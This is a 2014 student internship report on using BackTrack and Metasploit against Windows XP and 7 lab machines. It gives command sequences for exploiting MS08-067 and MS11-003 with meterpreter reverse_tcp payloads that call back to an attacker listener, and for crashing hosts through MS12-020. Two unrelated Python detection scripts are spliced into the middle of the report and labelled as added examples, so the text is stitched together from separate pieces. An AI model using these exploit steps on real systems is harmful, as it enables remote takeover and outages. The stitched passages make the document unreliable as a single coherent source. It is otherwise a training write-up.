VIETNAM NATIONAL UNIVERSITY OF HCMC
INTERNATIONAL UNIVERSITY
INTERNSHIP REPORT
by
ĐỖ LIÊN HÁN
Research and learn to use
Backtrack to exploit
Network vulnerabilities
Submitted to: School of Computer Science and Engineering
International University, VNU-HCM
August, 2014
2. Page | 2
INTERNSHIP REPORT
by
Đỗ Liên Hán
ITITIU10004
Submitted to: School of Computer Science and Engineering
International University, VNU-HCM
August, 2014
Organization/Company: Athena Center
Address: 92 Nguyễn Đình Chiểu, DaKao, Q1, Tp HCM
Phone: (08)3 2210 3801 – 090 7879 477
Duration of the Internship: 8 weeks (16-07-2014 – 16-08-2014)
Supervisors during the Internship:
Supervisor: Mr. Võ Đỗ Thắng.
Title: Lecturer
Phone: 0943230099
Supervisor
ACKNOWLEDGMENTS
I would like to show my sincere gratitude to International University and
Athena Center, which gave me the conditions to complete this internship. In this
internship, I gained many important experiences and essential knowledge that will help
me a lot in adapting to my later job.
I also want to say thanks to the professors in the School of Computer Science and
Engineering, who have taught and equipped me with the necessary knowledge which helped me
complete this topic.
Even though I have tried my best to complete this report, I believe that this
report may still contain some mistakes because of my deficiency in practical experience and
knowledge. I look forward to your understanding and sharing so that I can make my report
better.
Hồ Chí Minh, August 1, 2014
Internship student
Đỗ Liên Hán.
TABLE OF CONTENTS
I. DESCRIPTION OF COMPANY/ORGANIZATION................................................5
II. SUMMARY OF THE INTERNSHIP.......................................................................6
III. PLANNING ............................................................................................................8
IV. INTERNSHIP ACTIVITIES & ACHIEVEMENTS...............................................9
1. General information about security........................................................9
2. Backtrack ...............................................................................................9
3. Footprinting..........................................................................................15
4. Scanning...............................................................................................17
5. Enumeration.........................................................................................18
V. INTERNSHIP ASSESSMENT...............................................................................30
REFERENCES ............................................................................................................31
I. Description of company/organization:
Athena is an education and training center in the IT field. It was established in 2004.
This center lets people experience the work and study of IT engineers, in order to
contribute to developing the IT field in Vietnam. The company name written in English is
ATHENA ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED.
The major fields of Athena:
Athena center has been focusing deeply on education and training in system
and network security, network administration, e-commerce,… following the
quality standards of Microsoft, Linux LPI, Oracle, Cisco, CEH,… Moreover,
Athena center also has some separate programs to train and educate staff of some
government organizations.
After 10 years, many trainees from Athena center work in IT fields for
government organizations and big companies.
Besides its training programs, Athena center also cooperates and exchanges
technology with some universities such as the University of Technology, the University
of Information Technology, the University of Science,…
The instructors of Athena:
All the instructors of Athena center graduated from top universities in
Vietnam. They all hold international certificates such as CCNA, MCSA,
MCSE, CCNP, Security+ and CEH, and are Microsoft Certified Trainers. These
are the certificates required to satisfy the conditions for teaching at Athena center.
Besides, Athena’s instructors also go abroad to be updated on new
technologies from the USA, France, Holland,… and they transfer what they learn
to their learners at Athena.
II. Summary of Internship:
Nowadays, many devices such as PCs, laptops and mobile phones have an internet
connection. These devices have programs installed such as IE, Microsoft Office and Acrobat
Reader, and run operating systems such as Windows XP and Windows 7. Mobile
devices also face new techniques that allow hackers to add viruses to
programs which users download from the internet; these viruses can take the user’s
information without the user knowing anything. Even though users usually install updates from the
vendor, their devices are still threatened by hackers.
This topic is research on a program called BackTrack, which contains many
modules that allow people to test other machines for some already
known vulnerabilities, in order to gain control of the victim or just to collect information
about it.
During the internship, I learned to use BackTrack, from installing it on VMware to
attacking on a local network between virtual PCs in VMware.
After that I tested attacking from a Virtual Private Server, that is, from a different
network, to my local machine.
In this topic, I tested some vulnerabilities of Windows XP and Windows 7,
namely ms08-067, ms11-003 and ms12-020. These flaws can allow an attacker to gather
information about the user such as computer name, OS, user access rights and passwords.
These are my clips in which I recorded every step of the process of exploiting
the vulnerabilities ms08_067, ms11_003 and ms12_020; these were completed by
me with some help from my supervisor Prof. Vo Do Thang.
http://youtu.be/6SDqQTtkHmk
http://youtu.be/Z5LB5b545WE
http://youtu.be/xkV6DFm56b8
http://youtu.be/L2dBV0y_Hic
III. Planning:
- Week 1:
Receive material and prepare BackTrack with Windows.
Practice with vulnerabilities ms10_090, ms10_042.
- Week 2:
Test ms12_004.
Find information about ms08_067, ms12_020.
Practice with vulnerabilities ms08_067, ms12_020.
- Week 3:
Find information about ms11_003.
Practice with vulnerability ms11_003.
- Week 4:
Install and practice with Metasploit.
Register a VPS.
- Week 5:
Test an attack from the VPS to Windows on VMware on the local machine.
- Week 6:
Try exploiting information from the VPS to the local machine.
- Week 7:
Complete the system hacking class.
- Week 8:
Review and prepare for the presentation.
IV. Internship Activities & Achievements:
1. General information about network security:
In July, we learned of a big problem that had appeared: the Viet Hong company had used
software called Ptracker to track everything on the mobile phones of those who had
downloaded it, such as the contact list, messages and phone calls, in order to spy on
customers. In this event, about 14,000 mobile phones were attacked by this company and
lost a lot of essential information. Ptracker sent all information about the user to this
company, which also recorded the phone calls to and from the phones on which
Ptracker was installed, as well as their messages.
From this event, we can see the importance of security these days. As
technology changes day by day, we must equip ourselves with enough knowledge about
security, or at least know something, to make sure that our private information
or our secrets won’t be stolen by others.
2. Backtrack:
BackTrack was a Linux distribution, since superseded by Kali Linux, that focused on
security. It was based on the Ubuntu Linux distribution and aimed at digital forensics and
penetration testing use. In March 2013, the Offensive Security team rebuilt BackTrack
around the Debian distribution and released it under the name Kali Linux.
The evolution of BackTrack spans many years of development, penetration
tests, and unprecedented help from the security community. BackTrack originally
started with earlier versions of live Linux distributions called Whoppix, IWHAX, and
Auditor. When BackTrack was developed, it was designed to be an all-in-one live CD
used on security audits and was specifically crafted to not leave any remnants of itself
on the laptop. It has since expanded to being the most widely adopted penetration
testing framework in existence and is used by the security community all over the
world.
Install BackTrack on VMware:
First, I opened the VMware program and chose Create a New Virtual Machine.
After that I followed the steps below to create a new BackTrack system as a Unix guest.
In this BackTrack virtual machine I installed it with 20GB memory, 512MB
RAM and the network set to NAT using VMnet8.
Choose Default Boot Text Mode to continue.
After waiting a few seconds, this window appeared and I typed startx to open the
graphical user interface.
When it started with the GUI, I chose “install backtrack”, which opened the window
shown in the following picture.
To continue, I chose the language for this BackTrack program, the time zone,
memory and keyboard settings, and waited for it to complete the installation of the program.
At this point I can choose Install to start installing this software.
After clicking Install, I have to wait for some time to let the
program finish installing.
When it has finished, this box appears; click Restart to restart the computer.
When it has restarted, I can use the default root account of BackTrack to
log in with user name: root and password: toor. Then start the GUI of BackTrack
with the command “startx”.
3. Footprinting:
A. Introduction:
Footprinting is the first and most convenient way that hackers use to gather
information about computer systems and the companies they belong to. The purpose
of footprinting is to learn as much as you can about a system: its remote access
capabilities, its ports and services, and the aspects of its security.
In order to perform a successful hack on a system, it is best to know as much as you
can, if not everything, about that system. While there is nary a company in the world
that isn't aware of hackers, most companies are now hiring hackers to protect their
systems. And since footprinting can be used to attack a system, it can also be used to
protect it. If you can find anything out about a system, the company that owns that
system, with the right personnel, can find out anything they want about you.
An attacker will spend 90% of the time profiling an organization and
another 10% launching the attack.
1. Information gathering
2. Determining the network range
3. Identifying active machines
4. Finding open ports and access points
5. OS fingerprinting
6. Fingerprinting services
7. Mapping the network
B. Type of footprinting:
1) Active footprinting:
Contacting the target directly to seek information about it, such as name,
address, owner, network, company, staff,…
Contacting through email to find everything that can be obtained.
This method requires good communication skills and skills in extracting
information.
2) Passive footprinting:
Different from active footprinting, passive footprinting is also popular. This is
a way to collect information through the many free sources on the internet instead of
contacting employees or users of the target organization directly. For example, we can
access websites that provide services for learning more about a domain
name or website address, such as www.whoise.net, whoise.domaintools.com,
www.tenmien.vn, www.google.com,...
4. Scanning:
If footprinting is the identification of sources of information, scanning
is finding all the gates through which to get at that information. In the footprinting
process, we obtained an IP network range and a list of IP addresses through various
techniques, including whois and ARIN queries. This gives administrators more security
awareness, and gives hackers valuable information about the destination network: its IP
range, DNS servers and mail servers. In this chapter, we will determine which systems are
listening on the network and can be reached, using a variety of tools and techniques such
as ping sweeps and port scans. We can also manually bypass firewalls to scan
a system even when it is blocked by the filtering policy (filtering rules).
Objects of Scanning:
Live System: Determine whether the system we are targeting is active
or not, i.e. whether the computer is active on the internet and whether its IP address
is publicly exposed.
Port: The next goal is to determine which ports are open. Determining
this lets us know which services the computer exposes to the public, and from
there determine the purpose of the attack.
Operating System: Identifying the operating system used on the
target computer helps hackers find common vulnerabilities, since every operating
system has more or fewer hidden holes that enable it to be hacked. Determining the
operating system must include determining its version.
Service: Understanding the services running and listening on the
target system. Service versions also contain small flaws, but if you know
how to exploit them, they are no longer small.
IP Address: Not only the IP of a single host; we also carefully define the network
address range and other relevant hosts such as the Default Gateway, DNS
Server,…
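Scanning activity of the kind described above leaves a recognisable pattern in connection logs, which is what a defender watches for. As an added example that is not part of the report, the Python below flags a port scan and a ping sweep in a few constructed log lines; the log format, the thresholds and the addresses are all assumptions.

```python
"""Port-scan and ping-sweep detection over connection-log lines."""
from collections import defaultdict

# Constructed sample in a made-up '<epoch> <src> <dst> <dst_port> <proto>'
# format: 10.0.0.5 port-scans 192.168.1.131, then ICMP-sweeps 192.168.1.0/24;
# 10.0.0.9 is ordinary traffic to one service at a time.
SAMPLE_LOG = """\
1000 10.0.0.9 192.168.1.131 445 tcp
1001 10.0.0.5 192.168.1.131 21 tcp
1001 10.0.0.5 192.168.1.131 22 tcp
1001 10.0.0.5 192.168.1.131 23 tcp
1002 10.0.0.5 192.168.1.131 80 tcp
1002 10.0.0.5 192.168.1.131 135 tcp
1002 10.0.0.5 192.168.1.131 139 tcp
1003 10.0.0.5 192.168.1.131 445 tcp
1003 10.0.0.5 192.168.1.131 3389 tcp
1010 10.0.0.5 192.168.1.1 0 icmp
1010 10.0.0.5 192.168.1.2 0 icmp
1011 10.0.0.5 192.168.1.3 0 icmp
1011 10.0.0.5 192.168.1.4 0 icmp
1012 10.0.0.5 192.168.1.5 0 icmp
1200 10.0.0.9 192.168.1.131 80 tcp
"""

def parse_log(text):
    """Parse lines into (ts, src, dst, port, proto); skip malformed ones."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, dst, port, proto = parts
        events.append((int(ts), src, dst, int(port), proto))
    return events

def detect_scans(events, window=60, port_threshold=5, host_threshold=5):
    """Return sorted alerts (kind, src, target, count), one per src/target.
    For each source a window of `window` seconds is anchored at every event.
    portscan: >= port_threshold distinct ports on one dst (target = dst).
    sweep: >= host_threshold distinct dst hosts (target = '*').
    The count kept is the largest seen over all windows.
    """
    by_src = defaultdict(list)
    for ts, src, dst, port, _proto in events:
        by_src[src].append((ts, dst, port))
    alerts = {}

    def note(kind, src, target, count):
        key = (kind, src, target)
        alerts[key] = max(alerts.get(key, 0), count)

    for src, recs in by_src.items():
        recs.sort()
        for i, (t0, _, _) in enumerate(recs):
            span = [r for r in recs[i:] if r[0] - t0 <= window]
            ports_by_dst = defaultdict(set)
            for _, dst, port in span:
                ports_by_dst[dst].add(port)
            for dst, ports in ports_by_dst.items():
                if len(ports) >= port_threshold:
                    note("portscan", src, dst, len(ports))
            if len(ports_by_dst) >= host_threshold:
                note("sweep", src, "*", len(ports_by_dst))
    return sorted((k, s, t, c) for (k, s, t), c in alerts.items())
```

Tightening `window` to one second still catches the burst of ports against 192.168.1.131 but drops the slower sweep, which is the usual tuning trade-off between noise and missed slow scans.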
5. Enumeration:
Enumeration is the next step in the process of finding information about an
organization; it occurs after scanning and consists of collecting and analyzing user names,
computer names, shared resources and services. It also actively queries or binds to the target
to obtain more meaningful information. Enumeration can be defined as the process of
organizing the information obtained from the scanning process into an orderly system. The
extracted information includes things related to the objectives to be attacked, such as
user names, computer names (host names), services and shared
resources (shares); the techniques listed are carried out from inside the
environment. The enumeration phase includes connecting to the system and directly extracting
the information. The aim of the technique is to identify user accounts and
system accounts that could be used in a hack on the target. There is no need to look for an
administrator account at first; we can escalate from an account whose privileges allow
access to more accounts than were previously granted.
Enumeration is also known as network or vulnerability discovery. It is the act
of obtaining information that is readily available from the target's systems, applications
and networks. It is important to note that the enumeration phase is often the point where
the line between an ethical hack and a malicious attack can become blurred, as it is often
easy to go outside of the boundaries outlined in the original attack plan.
In order to construct a picture of an organization's environment, several tools
and techniques are available. These tools and techniques include port scanning and
Nmap. Although it is rather simple to collect information, it is rather difficult to
determine the value of that information in the hands of a hacker.
At first glance, enumeration is simple: take the collected data and evaluate it
collectively to establish a plan for more reconnaissance or to build a matrix for the
vulnerability analysis phase. However, the enumeration phase is where the ethical
hacker's ability to make logical deductions plays an enormous role.
6. MS08-067:
MS08-067 is not categorized as a virus, worm, Trojan or backdoor. It is a critical
vulnerability in the Windows Server Service on Windows 2008/Vista/2003/XP/2000
computers, which allows hackers to gain remote control of the affected computer with
the same privileges as the logged-on user.
The Server Service allows the user's local resources, such as disks and
printers, to be shared, so that other users on the network can access them. However,
there is a vulnerability because this service does not properly handle specially crafted
RPC requests.
Remote Procedure Call (RPC) is a protocol used by a program to request a
service from a program located on another computer in a network.
If exploited successfully, MS08-067 allows hackers to gain remote control of
the affected computer with the same privileges as the logged on user. If this user
had administrator rights, the hacker could take complete control of the system: create,
modify or delete files, install programs, create new user accounts, etc.
MS08-067 is usually exploited by sending a specially crafted network
packet to a vulnerable system. On Windows Vista and Server 2008 systems, the
attacking user must be authenticated.
I have a victim computer and try to gain control of it.
At first, I pinged the IP address to make sure that the victim computer has
connectivity. Then I used the nmap command to check whether the victim computer is vulnerable or not.
When sure that it is vulnerable, I started Metasploit and searched for the module.
Command:
search ms08_067 – to find the module.
use exploit/windows/smb/ms08_067_netapi – to apply the module.
show options – to see the attributes of the module.
set rhost 192.168.1.131 – to specify the target.
set payload windows/meterpreter/reverse_tcp – to create the response back.
set lhost 192.168.1.128 – to specify the IP of the attacking PC that listens for
information coming back from the victim.
exploit – to execute the module to attack the victim.
Migrate to keep the connection with the victim computer.
I can see the processes running on the victim through the command “ps”, and “sysinfo”
allows me to learn the computer’s information.
7. MS12_020:
Vulnerabilities in Remote Desktop Could Allow Remote Code Execution, and it
only affects computers which have the Remote Desktop Protocol (RDP) enabled. By default,
the Remote Desktop Protocol (RDP) is not enabled on any Windows operating system.
This module exploits the MS12-020 RDP vulnerability originally discovered and
reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU
packet is handled in the maxChannelIDs field, which will result in an invalid pointer being used,
therefore causing a denial-of-service condition.
CVE-2012-0002 is an internally reported vulnerability in Microsoft's Remote
Desktop Application. The patch for this vulnerability was released on March 13, 2012 as
MS12-020. This vulnerability can cause a full system compromise. Failed attempts to
exploit this vulnerability can cause a DoS of RDP.
This contains the following commands to exploit:
msfconsole – to start Metasploit.
search ms12_020 – to find the module used in this test.
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids – to apply the
module.
show options – to show the attributes of this module.
set rhost xxx.xxx.xxx.xxx – this is the command for me to type in the
IP address of the target. Ex: set rhost 192.168.1.129 – in this example,
192.168.1.129 is the IP address of the target.
run (or exploit) – this is the final command to make the module
active; then I got the result shown in the picture above.
The operating system crashed, so the attacked computer went down. Everything
that was running at that time stopped suddenly, which will cause a lot of trouble for the
user. The way to prevent this is to keep RDP disabled.
8. MS11-003
1. Introduction:
Microsoft Internet Explorer has yet another vulnerability, after so many
vulnerabilities have been found by security researchers. The MS11_003 vulnerability was
actually found on February 08, 2011 according to the Microsoft security bulletin.
This module exploits a memory corruption vulnerability within Microsoft’s
HTML engine (mshtml). When parsing an HTML page containing a recursive CSS
import, a C++ object is deleted and later reused. This leads to arbitrary code
execution. This exploit utilizes a combination of heap spraying and the .NET 2.0
‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to
ASLR. As such, this module should be reliable on all Windows versions with .NET
2.0.50727 installed.
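The recursive CSS import named in the module description is a condition a defender can check for in content before a browser parses it. As an added example that is not part of the report or of the Metasploit module, the Python below builds the @import graph of a constructed set of stylesheets and reports any import cycle; the example.test URLs, the in-memory map standing in for a proxy or scanner cache, and the simplified @import regex (no handling of CSS comments) are assumptions.

```python
"""Detect recursive CSS @import chains in a set of stylesheets."""
import re
from urllib.parse import urljoin

# Matches @import url("x"), @import url(x), @import "x" and @import 'x'.
IMPORT_RE = re.compile(
    r"""@import\s+(?:url\(\s*)?["']?([^"')\s;]+)["']?\s*\)?""",
    re.IGNORECASE,
)

# Constructed sample (URLs are made up): a.css and b.css import each
# other, self.css imports itself, clean.css imports a sheet with no loop.
STYLESHEETS = {
    "http://example.test/a.css": '@import url("b.css");\nbody { color: red; }',
    "http://example.test/b.css": "@import 'a.css';",
    "http://example.test/self.css": "@import url(self.css);",
    "http://example.test/clean.css": '@import "fonts.css";',
    "http://example.test/fonts.css": "h1 { font-weight: bold; }",
}

def imports_of(url, css):
    """Absolute URLs of every stylesheet that `css` (served at `url`) imports."""
    return [urljoin(url, ref) for ref in IMPORT_RE.findall(css)]

def build_graph(sheets):
    """Map each stylesheet URL to the list of URLs it imports."""
    return {url: imports_of(url, css) for url, css in sheets.items()}

def find_import_cycles(sheets):
    """Return sorted cycles; each is a tuple of URLs rotated to start at
    its smallest URL, so the same loop found from two entries collapses.
    URLs that were never fetched (not in `sheets`) end the walk."""
    graph = build_graph(sheets)
    cycles = set()

    def visit(node, path):
        if node in path:                          # back edge: a loop
            loop = path[path.index(node):]
            k = loop.index(min(loop))
            cycles.add(tuple(loop[k:] + loop[:k]))
            return
        for nxt in graph.get(node, []):
            visit(nxt, path + [node])

    for start in graph:
        visit(start, [])
    return sorted(cycles)

def is_recursive(url, sheets):
    """True if the stylesheet at `url` eventually imports itself."""
    return any(url in cycle for cycle in find_import_cycles(sheets))
```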
2. Exploiting Step by Step:
To start, I used msfconsole to start Metasploit, then I used the command search
ms11_003 to find the module for vulnerability ms11_003.
Type the command use exploit/windows/browser/ms11_003_ie_css_import to
start the module.
Type the command set payload windows/meterpreter/reverse_tcp to set up the
way for the PC to respond to the attacker when they successfully control
the victim’s computer.
The command show options allows the attacker to see the options they need to fill
in.
Next, the attacker has to set the server host, the listen host, the port and the
path so that they can receive the connection from the computer when the virus
successfully runs on it.
Finally, type the command exploit to make Metasploit generate a URL for
the computer to access.
And in this picture, the attack has succeeded. The attacker transfers the virus to the
computer that accessed the URL and gains control of the PC. After that, I can get information
with the command sysinfo, get the user rights with getuid,…
V. Internship Assessment:
In the internship, I have learnt more about security, knowledge which I couldn’t find
in my school program. BackTrack is a collection of tools for people who want to know more
about security. Every vulnerability that has appeared in this operating system has been found
by many people, and these were fixed. However, it doesn’t mean that this error will not
happen on our computer even though it is known, because sometimes the error does not
belong to the operating system but to the program running on the system; that is
what I learned about the system when I learned how to use BackTrack.
VI. References
[0] Athena Center internal material and CDs.
[1] http://www.pandasecurity.com/homeusers/security-info/201683/information/MS08-067
[2] https://technet.microsoft.com/en-us/library/security/ms12-020.aspx
[3] https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[4] https://technet.microsoft.com/en-us/library/security/ms11-003.aspx
[5] http://www.hacking-tutorial.com/hacking-tutorial/exploiting-ms11_003-internet-explorer-vulnerability-using-metasploit-framework/#sthash.esO69EUT.dpbs